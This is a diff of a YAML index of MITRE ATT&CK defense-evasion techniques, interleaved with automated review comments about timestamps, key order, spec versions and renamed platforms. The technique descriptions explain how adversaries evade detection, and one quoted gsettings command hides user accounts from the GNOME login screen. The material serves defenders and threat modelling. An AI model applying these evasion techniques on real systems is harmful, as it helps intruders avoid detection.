+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
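Review bot: the substantive changes for T1480 are the new third description paragraph on user-agent based guardrails (L35386), the matching `Trellix-Qakbot` reference (L35436–L35440, whose `source_name` matches the citation key) and the version bump from 1.1 to 1.2 (L35410); the remaining lines are key reordering, with `external_id` and `url` swapping places under each reference (L35427–L35429, L35431 and L35435). `x_mitre_detection` is unchanged (L35393–L35396 against L35455–L35458) and `x_mitre_data_sources` still lists only process and command sources, so the network-side behaviour the new paragraph describes has no corresponding detection guidance in this object; worth confirming that this matches upstream rather than being a partial sync.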
@@ -8217,7 +8326,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8243,7 +8351,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8268,8 +8376,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -8330,7 +8436,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8403,7 +8508,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8432,7 +8537,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8496,11 +8600,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8585,12 +8688,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8665,45 +8767,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8727,6 +8794,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8737,9 +8807,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8749,8 +8824,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
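Review bot: the FIN7 reference is now normalised so that `source_name` leads the list item (L35648–L35651), whereas the removed form at L35598–L35601 had `url` as the first key and `source_name` last; with this change all reference entries for T1497.002 share one key order, which is the layout the rest of the diff converges on and makes future hunks for this object easier to read.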
@@ -8807,7 +8909,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
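Review bot: the modified timestamp for T1134.004 moves backward, from 2022-05-24T14:00:00.188Z to 2022-05-03T02:15:42.360Z, and the same backward move recurs throughout this file. The old values share a synthetic-looking suffix (14:00:00.188Z, 14:49:39.188Z) while the new ones carry arbitrary sub-second values, which reads as a switch from locally generated timestamps to the upstream STIX modified field. That is the right thing to do, but the commit message should say so explicitly, since any consumer that compares this index by modified date will otherwise see these as regressions.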
@@ -8832,7 +8934,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
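Review bot: spec_version: '2.1' is dropped from T1134.004 here and from every other technique object in this file with nothing put in its place. If anything downstream validates these technique blocks as STIX 2.1 objects, spec_version is a required common property there and validation will start failing; if the index is only consumed as plain YAML, state in the commit message that the field was removed on purpose so the next regeneration does not reintroduce it.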
@@ -8903,7 +9004,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8930,11 +9031,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8988,7 +9088,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -9024,7 +9123,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -9050,8 +9149,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
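Review bot: for T1574.013 both spec_version and x_mitre_attack_spec_version: 2.1.0 are removed and nothing is added, whereas objects such as T1078 further down get x_mitre_attack_spec_version re-added at 3.2.0. Unless the key has been moved to an earlier position in this object outside the hunk, T1574.013 will end up with no attack spec version at all, and T1542.004, T1601, T1036.001, T1564.006, T1134.005 and T1218.009 below lose the same pair the same way. Worth grepping the regenerated file for technique objects that lack x_mitre_attack_spec_version before merging.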
@@ -9077,7 +9174,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9099,8 +9196,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9166,12 +9261,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9226,7 +9320,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9374,7 +9467,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9401,7 +9493,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9436,8 +9528,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9503,7 +9593,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9529,7 +9618,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9554,11 +9643,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9575,7 +9663,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9585,7 +9672,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9594,19 +9681,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
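Review bot: T1078 loses the Azure AD, Office 365 and Google Workspace platforms, gains Office Suite and Identity Provider, and is bumped to version 2.7. Any per-platform index that is produced by filtering on x_mitre_platforms will no longer match this technique under the old platform names, so confirm the index generator knows the new names; otherwise Valid Accounts and the other techniques renamed the same way in this diff (T1556.006 and T1550.004) silently drop out of those indexes.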
@@ -9654,11 +9739,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
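Review bot: this hunk re-adds x_mitre_attack_spec_version (now 3.2.0) and x_mitre_modified_by_ref at the end of the T1078 object after the 3.1.0 value and the modified_by_ref were removed near the kill_chain_phases block above. The net effect is a key reorder plus a spec-version bump, which is fine, but the reorder is what makes this diff so noisy (T1556.006 below does the same thing in the opposite direction). If the generator can emit keys in a fixed order, the review surface for future ATT&CK syncs shrinks considerably.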
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9726,18 +9812,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
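Review bot: the Leitch Hollowing citation now points at a third-party mirror (new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf) instead of the original autosectools.com PDF, with the retrieval date moved to September 12, 2024. Acceptable as a link-rot fix, but since the source_name and the citation text (Leitch, J. (n.d.). Process Hollowing.) are carried over unchanged, verify that the mirrored PDF is the same document before adopting it.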
@@ -9784,7 +9869,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9806,7 +9891,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9881,6 +9965,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9940,12 +10025,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9974,24 +10058,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
